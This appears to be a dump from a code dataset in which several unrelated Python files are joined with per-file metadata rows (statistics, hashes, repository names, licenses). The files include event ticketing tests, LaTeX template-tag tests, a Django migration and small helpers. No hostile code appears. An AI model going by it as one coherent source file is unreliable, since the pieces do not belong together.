    await login()
    data = dict(name='Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published')
    # 123 does not match any created event.
    r = await cli.json_post(url('event-clone', id=123), data=data)
    assert r.status == 404, await r.text()
async def test_edit_waiting_list(cli, url, db_conn, factory: Factory, login, dummy_server):
    """Raising an event's ticket_limit emails users on the waiting list.

    One user ('ben') is on the waiting list; after the edit a single
    'tickets available' notification must have been sent to him.
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    ben = await factory.create_user(first_name='ben', last_name='ben', email='ben@example.org')
    await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', factory.event_id, ben)
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=12))
    assert r.status == 200, await r.text()
    assert await db_conn.fetchval('SELECT ticket_limit FROM events') == 12
    # Exactly one notification email, addressed to the waiting-list user.
    assert len(dummy_server.app['emails']) == 1
    email = dummy_server.app['emails'][0]
    assert email['To'] == 'ben ben <ben@example.org>'
    assert email['Subject'] == 'The Event Name - New Tickets Available'
    assert 'trigger=event-tickets-available' in email['X-SES-MESSAGE-TAGS']
async def test_waiting_list_remove(cli, url, db_conn, factory: Factory, settings):
    """A correctly signed unsubscribe link removes the waiting-list entry.

    No login is required — the signature in the query string authorises the
    removal — and the user is redirected (307) to the confirmation page.
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    event_id = await factory.create_event()
    ben = await factory.create_user(first_name='ben', last_name='ben', email='ben@example.org')
    await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', event_id, ben)
    query = {'sig': waiting_list_sig(event_id, ben, settings)}
    r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben, query=query), allow_redirects=False)
    assert r.status == 307, await r.text()
    assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/waiting-list-removed/'
    assert await db_conn.fetchval('select count(*) from waiting_list') == 0
async def test_waiting_list_remove_wrong(cli, url, db_conn, factory: Factory, settings):
    """Unsubscribe requests with a missing, bad, or mismatched signature are rejected.

    All three cases redirect (307) to the unsubscribe-invalid page and leave
    the waiting-list entry in place.
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    event_id = await factory.create_event()
    ben = await factory.create_user(first_name='ben', last_name='ben', email='ben@example.org')
    await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', event_id, ben)
    # Case 1: no signature at all.
    r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben), allow_redirects=False)
    assert r.status == 307, await r.text()
    assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/unsubscribe-invalid/'
    assert await db_conn.fetchval('select count(*) from waiting_list') == 1
    # Case 2: a garbage signature.
    query = {'sig': 'wrong'}
    r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben, query=query), allow_redirects=False)
    assert r.status == 307, await r.text()
    assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/unsubscribe-invalid/'
    assert await db_conn.fetchval('select count(*) from waiting_list') == 1
    # Case 3: a valid signature, but for a different event id.
    query = {'sig': waiting_list_sig(event_id + 1, ben, settings)}
    r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben, query=query), allow_redirects=False)
    assert r.status == 307, await r.text()
    assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/unsubscribe-invalid/'
    assert await db_conn.fetchval('select count(*) from waiting_list') == 1
async def test_event_allow_donation(cli, url, dummy_server, factory: Factory, login, db_conn):
    """The public event endpoint reports mode flags and lists donation ticket types.

    NOTE(review): the dummy_server, login and db_conn fixtures are accepted
    but never used here — possibly needed only for their setup side effects;
    confirm before removing.
    """
    await factory.create_company()
    await factory.create_cat(slug='testing')
    await factory.create_user()
    await factory.create_event(allow_tickets=False, slug='evt', allow_donations=True, status='published')
    r = await cli.get(url('event-get-public', category='testing', event='evt'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['event']['allow_tickets'] is False
    assert data['event']['allow_donations'] is True
    assert data['ticket_types'] == [
        {'name': 'Standard', 'price': 10, 'mode': 'donation'},
        {'name': 'Standard', 'price': None, 'mode': 'ticket'},
    ]
async def test_create_event_mode(cli, url, db_conn, factory: Factory, login, dummy_server):
    """Creating an event with mode='both' sets allow_tickets and allow_donations."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        mode='both',
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': None},
        timezone='Europe/London',
        long_description='hello',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    # 'both' maps to both boolean columns being set.
    allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
    assert (allow_tickets, allow_donations) == (True, True)
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_edit_event_mode(cli, url, db_conn, factory: Factory, login):
    """Editing an event's mode toggles the allow_tickets/allow_donations columns.

    'donations' flips the flags to (False, True); a follow-up edit to 'both'
    sets (True, True). No new event row is created by either edit.
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(allow_tickets=True, allow_donations=False)
    await login()
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(mode='donations'))
    assert r.status == 200, await r.text()
    allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
    assert (allow_tickets, allow_donations) == (False, True)
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(mode='both'))
    assert r.status == 200, await r.text()
    allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
    assert (allow_tickets, allow_donations) == (True, True)
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_donation_tt_updates(cli, url, factory: Factory, db_conn, login):
    """Updating donation ticket types (rename + add) is reflected on the public endpoint."""
    await factory.create_company()
    await factory.create_cat(slug='cat')
    await factory.create_user()
    await factory.create_event(slug='evt', status='published')
    await login()
    r = await cli.get(url('event-get-public', category='cat', event='evt'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['ticket_types'] == [
        {'name': 'Standard', 'price': 10, 'mode': 'donation'},
        {'name': 'Standard', 'price': None, 'mode': 'ticket'},
    ]
    # Target the fixed-amount donation type (not the custom-amount one).
    tt_id = await db_conn.fetchval("SELECT id FROM ticket_types where mode='donation' and not custom_amount")
    ticket_types = [
        {'id': tt_id, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'donation'},
        {'name': 'new', 'price': 44, 'active': True, 'slots_used': 1, 'mode': 'donation'},
    ]
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
    assert r.status == 200, await r.text()
    # The public listing now shows the renamed type and the newly added one.
    r = await cli.get(url('event-get-public', category='cat', event='evt'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['ticket_types'] == [
        {'mode': 'donation', 'name': 'new', 'price': 44},
        {'name': 'foobar', 'price': 123, 'mode': 'donation'},
        {'name': 'Standard', 'price': None, 'mode': 'ticket'},
    ]
async def test_tt_updates_invalid(cli, url, factory: Factory, db_conn, login):
    """Submitting ticket types with mixed modes (donation + ticket) is rejected with 400."""
    await factory.create_company()
    await factory.create_cat(slug='cat')
    await factory.create_user()
    await factory.create_event(slug='evt', status='published')
    await login()
    tt_id1 = await db_conn.fetchval("SELECT id FROM ticket_types where mode='donation' and not custom_amount")
    tt_id2 = await db_conn.fetchval("SELECT id FROM ticket_types where mode='ticket'")
    # One donation-mode and one ticket-mode entry in the same update payload.
    ticket_types = [
        {'id': tt_id1, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'donation'},
        {'id': tt_id2, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'ticket'},
    ]
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
    assert r.status == 400, await r.text()
    assert await r.json() == {'message': 'all ticket types must have the same mode'}
async def test_tt_updates_change(cli, url, factory: Factory, db_conn, login):
    """Changing an existing ticket type's mode is rejected (400) and leaves data untouched."""
    await factory.create_company()
    await factory.create_cat(slug='cat')
    await factory.create_user()
    await factory.create_event(slug='evt', status='published')
    await login()
    tt_id = await db_conn.fetchval("SELECT id FROM ticket_types where mode='ticket'")
    # Attempt to flip an existing 'ticket' type to 'donation'.
    ticket_types = [
        {'id': tt_id, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'donation'},
    ]
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
    assert r.status == 400, await r.text()
    assert await r.json() == {'message': 'ticket type modes should not change'}
    # The public listing must be unchanged after the failed update.
    r = await cli.get(url('event-get-public', category='cat', event='evt'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['ticket_types'] == [
        {'name': 'Standard', 'price': 10, 'mode': 'donation'},
        {'name': 'Standard', 'price': None, 'mode': 'ticket'},
    ]
| 39.065667
| 120
| 0.644475
| 10,191
| 75,553
| 4.614562
| 0.0419
| 0.080635
| 0.118655
| 0.043039
| 0.887979
| 0.855828
| 0.824994
| 0.800519
| 0.786208
| 0.773619
| 0
| 0.020202
| 0.209853
| 75,553
| 1,933
| 121
| 39.085877
| 0.767547
| 0.000569
| 0
| 0.667082
| 0
| 0.006223
| 0.253614
| 0.043306
| 0
| 0
| 0
| 0
| 0.166148
| 1
| 0
| false
| 0
| 0.005601
| 0
| 0.005601
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5a6ef040df6044245191e961aa7db56540fd9689
| 62
|
py
|
Python
|
examples/__init__.py
|
sheepy0125/hisock
|
177b172032837f17567e80426bae0e3ec79016b7
|
[
"MIT"
] | null | null | null |
examples/__init__.py
|
sheepy0125/hisock
|
177b172032837f17567e80426bae0e3ec79016b7
|
[
"MIT"
] | 1
|
2021-09-03T14:22:15.000Z
|
2021-09-03T14:22:15.000Z
|
examples/__init__.py
|
sheepy0125/hisock
|
177b172032837f17567e80426bae0e3ec79016b7
|
[
"MIT"
] | null | null | null |
# Import the example submodules for their side effects so that
# `import examples` exposes `examples.basic` and `examples.tictactoe`.
import examples.basic
import examples.tictactoe
# Drop the bare package name bound by the imports above — presumably to keep
# the examples package namespace tidy; confirm intent before removing.
del examples
| 12.4
| 25
| 0.854839
| 8
| 62
| 6.625
| 0.625
| 0.528302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112903
| 62
| 4
| 26
| 15.5
| 0.963636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5a829f45c7b4e91800daf3cf949681b8b6011fe5
| 40
|
py
|
Python
|
test.py
|
PanggNOTlovebean/TimeseriesTransformer
|
ab7aa0bc638dc3cbb83a26c037573c9a60055531
|
[
"MIT"
] | null | null | null |
test.py
|
PanggNOTlovebean/TimeseriesTransformer
|
ab7aa0bc638dc3cbb83a26c037573c9a60055531
|
[
"MIT"
] | null | null | null |
test.py
|
PanggNOTlovebean/TimeseriesTransformer
|
ab7aa0bc638dc3cbb83a26c037573c9a60055531
|
[
"MIT"
] | null | null | null |
# Smoke test: import NumPy and print the installed version to stdout.
import numpy as np
print(np.__version__)
| 20
| 21
| 0.825
| 7
| 40
| 4.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 2
| 21
| 20
| 0.805556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
ceab3fff7f588e212d7b18deba285ef57e77696b
| 7,829
|
py
|
Python
|
latexify/tests.py
|
AmmsA/django-latexify
|
2beb04d9b16229ab2469c2920c3426f67030f2eb
|
[
"MIT"
] | 27
|
2016-06-20T08:44:38.000Z
|
2018-08-22T16:33:47.000Z
|
latexify/tests.py
|
AmmsA/django-latexify
|
2beb04d9b16229ab2469c2920c3426f67030f2eb
|
[
"MIT"
] | 4
|
2016-10-17T17:52:32.000Z
|
2018-05-04T12:29:05.000Z
|
latexify/tests.py
|
AmmsA/django-latexify
|
2beb04d9b16229ab2469c2920c3426f67030f2eb
|
[
"MIT"
] | 9
|
2017-01-07T14:42:42.000Z
|
2018-09-14T21:12:34.000Z
|
from __future__ import unicode_literals
from django.test import TestCase
from django.template import Context, Template
from django.template import TemplateSyntaxError
class LatexifyTests(TestCase):
    r"""Render the ``latexify`` template tag and assert its exact HTML output.

    Each test builds a template string using ``{% latexify %}``, renders it
    with a context, and compares the produced span markup verbatim.  In the
    input text, ``\$...\$`` delimits inline math and ``\$$...\$$`` delimits
    block math; malformed or mismatched delimiters must be passed through
    escaped rather than rendered.
    """
    def tag_test(self, template, context, output):
        """Render *template* (with the tag library loaded) against *context*
        and assert the result equals *output* exactly."""
        t = Template("{}{}".format('{% load latexify %}', template))
        c = Context(context)
        self.assertEqual(t.render(c), output)
    def test__normal_text(self):
        # Plain text is wrapped in the text span unchanged.
        template = '{% latexify test_text %}'
        context = {'test_text': 'hello world'}
        output = '<span class="django-latexify text">hello world</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_and_no_math_in_text(self):
        # parse_math=True with no math delimiters behaves like plain text.
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': 'hello world'}
        output = '<span class="django-latexify text">hello world</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_and_inline_math_in_text(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$f(x)=\sqrt(2)\$'}
        output = '<span class="django-latexify text">' \
                 '<span class="django-latexify math inline">' \
                 'f(x)=\\sqrt(2)</span>' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_and_block_math_in_text(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$$f(x)=\sqrt(2)\$$'}
        output = '<span class="django-latexify text">' \
                 '<span class="django-latexify math block">' \
                 'f(x)=\\sqrt(2)</span>' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_and_block_and_inline_math_in_text(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$$f(x)=\sqrt(4)\$$ is \$f(x)=2\$'}
        output = '<span class="django-latexify text">' \
                 '<span class="django-latexify math block">' \
                 'f(x)=\\sqrt(4)</span> is ' \
                 '<span class="django-latexify math inline">f(x)=2</span>' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_and_inline_and_block_math_in_text(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$f(x)=\sqrt(4)\$ is \$$f(x)=2\$$'}
        output = '<span class="django-latexify text">' \
                 '<span class="django-latexify math inline">' \
                 'f(x)=\\sqrt(4)</span> is ' \
                 '<span class="django-latexify math block">f(x)=2</span>' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_not_closed_inline_math_tag_in_text(self):
        # An unterminated delimiter is not rendered as math; the raw
        # (escaped) text is emitted instead.
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$f(x)=\sqrt(4)'}
        output = '<span class="django-latexify text">\\$f(x)=\\sqrt(4)</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_not_closed_block_math_tag_in_text(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$$f(x)=\sqrt(4)'}
        output = '<span class="django-latexify text">' \
                 '\\$$f(x)=\\sqrt(4)' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_unmatching_math_tags_in_text(self):
        # Block opener with inline closer: treated as plain (escaped) text.
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$$f(x)=\sqrt(4)\$'}
        output = '<span class="django-latexify text">' \
                 '\\$$f(x)=\\sqrt(4)\\$' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_unmatching_math_tags_reversed(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$f(x)=\sqrt(4)\$$'}
        output = '<span class="django-latexify text">' \
                 '\\$f(x)=\\sqrt(4)\\$$' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_inline_tag_inside_block_tag(self):
        # Nested delimiters are not parsed as math.
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$$g(x)=\$\sqrt(9)\$\$$'}
        output = '<span class="django-latexify text">' \
                 '\\$$g(x)=\\$\\sqrt(9)\\$\\$$' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_block_tag_inside_inline_tag(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text': '\$y(x)=\$$\sqrt(16)\$$\$'}
        out = '<span class="django-latexify text">' \
              '\\$y(x)=\\$$\\sqrt(16)\\$$\\$' \
              '</span>'
        self.tag_test(template, context, out)
    def test__parse_math_is_true_normal_text_then_block_tag(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text':
                   'The following math eq: \$$y(x)=\sqrt(16)\$$ is complete'}
        output = '<span class="django-latexify text">' \
                 'The following math eq: ' \
                 '<span class="django-latexify math block">' \
                 'y(x)=\\sqrt(16)</span>' \
                 ' is complete</span>'
        self.tag_test(template, context, output)
    def test__parse_math_is_true_normal_text_then_inline_tag(self):
        template = '{% latexify test_text parse_math=True %}'
        context = {'test_text':
                   'The following math eq: \$y(x)=\sqrt(16)\$ is complete'}
        output = '<span class="django-latexify text">' \
                 'The following math eq: ' \
                 '<span class="django-latexify math inline">' \
                 'y(x)=\\sqrt(16)</span>' \
                 ' is complete</span>'
        self.tag_test(template, context, output)
    def test__both_inline_and_block_args_are_true(self):
        # When both flags are set, the whole text is wrapped as inline math
        # and inner delimiters are left escaped.
        template = '{% latexify test_text math_inline=True math_block=True %}'
        context = {'test_text':
                   'The following math eq: \$y(x)=\sqrt(16)\$ is complete'}
        output = '<span class="django-latexify math inline">' \
                 'The following math eq: ' \
                 '\\$y(x)=\\sqrt(16)\\$ is complete' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__math_block_set_true(self):
        template = '{% latexify test_text math_block=True %}'
        context = {'test_text':
                   'The following math eq: \$$y(x)=\sqrt(16)\$$ is complete'}
        output = '<span class="django-latexify math block">' \
                 'The following math eq: ' \
                 '\\$$y(x)=\\sqrt(16)\\$$ ' \
                 'is complete</span>'
        self.tag_test(template, context, output)
    def test__latex_css_is_specified(self):
        # latex_css replaces the default class suffix on the wrapper span.
        template = '{% latexify test_text latex_css="my_css_class" %}'
        context = {'test_text':
                   'Hello world'}
        output = '<span class="django-latexify my_css_class">' \
                 'Hello world' \
                 '</span>'
        self.tag_test(template, context, output)
    def test__value_from_setting(self):
        # The value_from_settings tag echoes the named setting's value.
        template = '{% value_from_settings "LATEX_MATH_INLINE_CSS_CLASS" %}'
        context = {}
        output = 'django-latexify math inline'
        self.tag_test(template, context, output)
    def test__value_from_setting_no_arg(self):
        # Omitting the required setting name raises at template-parse time.
        with self.assertRaises(TemplateSyntaxError):
            template = '{% value_from_settings %}'
            context = {}
            output = ''
            self.tag_test(template, context, output)
| 44.994253
| 78
| 0.569166
| 930
| 7,829
| 4.516129
| 0.078495
| 0.064762
| 0.089286
| 0.136905
| 0.852619
| 0.832381
| 0.796905
| 0.780714
| 0.778095
| 0.76619
| 0
| 0.007365
| 0.271554
| 7,829
| 173
| 79
| 45.254335
| 0.72909
| 0
| 0
| 0.573333
| 0
| 0
| 0.38549
| 0.124154
| 0
| 0
| 0
| 0
| 0.013333
| 1
| 0.133333
| false
| 0
| 0.026667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0c9f42994e6e22c376a892601d29f9164a66c49b
| 40
|
py
|
Python
|
molpy/algorithms/__init__.py
|
kylincaster/molpy
|
39304733570d62613bd7708834d2185bcce4ae86
|
[
"BSD-3-Clause"
] | 6
|
2021-11-04T12:28:44.000Z
|
2021-12-22T13:49:52.000Z
|
molpy/algorithms/__init__.py
|
kylincaster/molpy
|
39304733570d62613bd7708834d2185bcce4ae86
|
[
"BSD-3-Clause"
] | 2
|
2021-11-26T12:06:24.000Z
|
2021-11-28T11:03:11.000Z
|
molpy/algorithms/__init__.py
|
kylincaster/molpy
|
39304733570d62613bd7708834d2185bcce4ae86
|
[
"BSD-3-Clause"
] | 4
|
2021-11-04T10:36:51.000Z
|
2021-12-17T11:58:47.000Z
|
from molpy.algorithms.traversal import *
| 40
| 40
| 0.85
| 5
| 40
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 40
| 1
| 40
| 40
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0cbd3fc9dcec7649c2e4f4385831a4e1a042e2ad
| 52
|
py
|
Python
|
spark/pi-v1/model/calculate_pi.py
|
PipelineAI/models
|
d8df07877aa8b10ce9b84983bb440af75e84dca7
|
[
"Apache-2.0"
] | 44
|
2017-11-17T06:19:05.000Z
|
2021-11-03T06:00:56.000Z
|
spark/pi-v1/model/calculate_pi.py
|
PipelineAI/models
|
d8df07877aa8b10ce9b84983bb440af75e84dca7
|
[
"Apache-2.0"
] | 3
|
2018-08-09T14:28:17.000Z
|
2018-09-10T03:32:42.000Z
|
spark/pi-v1/model/calculate_pi.py
|
PipelineAI/models
|
d8df07877aa8b10ce9b84983bb440af75e84dca7
|
[
"Apache-2.0"
] | 21
|
2017-11-18T15:12:12.000Z
|
2020-08-15T07:08:33.000Z
|
def calculate(count, n):
    """Scale a hit count to a pi estimate: 4 * count / n.

    count -- number of sampled points that satisfied the test
             (presumably "inside the quarter circle" — confirm with caller)
    n     -- total number of samples; must be non-zero

    Returns the estimate as a float.
    """
    # Keep the original operand order (4.0 * count, then / n) so the
    # floating-point result is bit-identical to the previous version.
    scaled_hits = 4.0 * count
    return scaled_hits / n
| 17.333333
| 26
| 0.615385
| 9
| 52
| 3.555556
| 0.777778
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 0.25
| 52
| 2
| 27
| 26
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
0cc568d9e0c6f21fee456a7266078b1620ce9fa5
| 1,165
|
py
|
Python
|
app/grandchallenge/challenges/migrations/0029_auto_20200918_1413.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/challenges/migrations/0029_auto_20200918_1413.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/challenges/migrations/0029_auto_20200918_1413.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0.10 on 2020-09-18 14:13
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the four publication_* metadata fields from both the
    Challenge and ExternalChallenge models."""
    dependencies = [
        ("challenges", "0028_auto_20200917_1113"),
    ]
    operations = [
        # Challenge: drop publication metadata.
        migrations.RemoveField(
            model_name="challenge", name="publication_citation_count",
        ),
        migrations.RemoveField(
            model_name="challenge", name="publication_google_scholar_id",
        ),
        migrations.RemoveField(
            model_name="challenge", name="publication_journal_name",
        ),
        migrations.RemoveField(
            model_name="challenge", name="publication_url",
        ),
        # ExternalChallenge: drop the same four fields.
        migrations.RemoveField(
            model_name="externalchallenge", name="publication_citation_count",
        ),
        migrations.RemoveField(
            model_name="externalchallenge",
            name="publication_google_scholar_id",
        ),
        migrations.RemoveField(
            model_name="externalchallenge", name="publication_journal_name",
        ),
        migrations.RemoveField(
            model_name="externalchallenge", name="publication_url",
        ),
    ]
| 29.871795
| 78
| 0.620601
| 100
| 1,165
| 6.96
| 0.38
| 0.241379
| 0.298851
| 0.344828
| 0.778736
| 0.778736
| 0.778736
| 0.5
| 0.172414
| 0
| 0
| 0.037915
| 0.275536
| 1,165
| 38
| 79
| 30.657895
| 0.78673
| 0.039485
| 0
| 0.5
| 1
| 0
| 0.290958
| 0.162041
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0cf6d9df7bf30aa3202bb6a450296d304eda30df
| 162
|
py
|
Python
|
taurex/data/profiles/pressure/__init__.py
|
ucl-exoplanets/TauREx3_public
|
cf8da465448df44c3c4dcc2cd0002ef34edd3920
|
[
"BSD-3-Clause"
] | 10
|
2019-12-18T09:19:16.000Z
|
2021-06-21T11:02:06.000Z
|
taurex/data/profiles/pressure/__init__.py
|
ucl-exoplanets/TauREx3_public
|
cf8da465448df44c3c4dcc2cd0002ef34edd3920
|
[
"BSD-3-Clause"
] | 10
|
2020-03-24T18:02:15.000Z
|
2021-08-23T20:32:09.000Z
|
taurex/data/profiles/pressure/__init__.py
|
ucl-exoplanets/TauREx3_public
|
cf8da465448df44c3c4dcc2cd0002ef34edd3920
|
[
"BSD-3-Clause"
] | 8
|
2020-03-26T14:16:42.000Z
|
2021-12-18T22:11:25.000Z
|
from .pressureprofile import SimplePressureProfile, PressureProfile
from .arraypressure import ArrayPressureProfile
from .filepressure import FilePressureProfile
| 40.5
| 67
| 0.895062
| 13
| 162
| 11.153846
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080247
| 162
| 3
| 68
| 54
| 0.973154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b23c2d24c2930d57cd73d7f5f0fa032271cc2af
| 141
|
py
|
Python
|
tests/base.py
|
nephila/djangocms-apphook-setup
|
615491dcb4c9383f346abfa8f79f7f5309722405
|
[
"BSD-3-Clause"
] | 9
|
2015-10-25T18:44:36.000Z
|
2020-12-28T18:20:38.000Z
|
tests/base.py
|
nephila/djangocms-apphook-setup
|
615491dcb4c9383f346abfa8f79f7f5309722405
|
[
"BSD-3-Clause"
] | 13
|
2015-12-20T13:01:10.000Z
|
2020-12-02T11:18:18.000Z
|
tests/base.py
|
nephila/djangocms-apphook-setup
|
615491dcb4c9383f346abfa8f79f7f5309722405
|
[
"BSD-3-Clause"
] | 5
|
2016-09-29T05:23:44.000Z
|
2021-07-08T07:15:56.000Z
|
from app_helper.base_test import BaseTestCase
class BaseTest(BaseTestCase):
    """
    Shared base class for this package's tests.

    Currently adds no behaviour beyond app_helper's BaseTestCase;
    presumably a single place to attach common test utilities later.
    """
    pass
| 14.1
| 45
